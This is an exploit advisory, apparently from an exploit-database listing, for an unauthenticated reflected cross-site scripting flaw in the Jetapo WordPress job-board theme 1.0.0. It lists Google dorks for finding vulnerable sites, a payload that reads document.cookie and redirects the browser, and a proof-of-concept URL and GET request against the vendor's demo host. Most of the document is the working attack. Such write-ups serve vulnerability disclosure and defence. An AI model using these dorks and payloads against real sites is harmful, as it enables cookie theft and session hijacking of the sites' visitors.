[+] Exploit Title: Jetapo | Jobboard WordPress Theme v1.0.0 - Unauthenticated Reflected XSS
[+] Google Dork #1: inurl:/wp-content/themes/jetapo/
[+] Google Dork #2: inurl:/wp-content/themes/jetapo-with-woocommerce/
[+] Date: 2020-07-02
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: InwaveThemes [ http://inwavethemes.com ]
[+] Software Version: 1.0.0
[+] Software Link: https://themeforest.net/item/jetapo-jobboard-wordpress-theme/25398118
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An Unauthenticated Reflected XSS vulnerability was discovered in the Jetapo theme through 1.0.0 for WordPress.



### [ Payload: ]

[$] 1"--><img src=x onerror=(alert)(document.cookie);window.location=`https://twitter.com/vlad_vector`;>



### [ PoC: ]

[!] https://jetapo.inwavethemes.com/jobs/?location=%22%20autofocus%20onfocus=alert(`VL%CE%9BDV%CE%9ECTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;%20%22%3E

[!] GET /jobs/?location=%22%20autofocus%20onfocus=alert(`VL%CE%9BDV%CE%9ECTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;%20%22%3E HTTP/1.1
Host: jetapo.inwavethemes.com



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector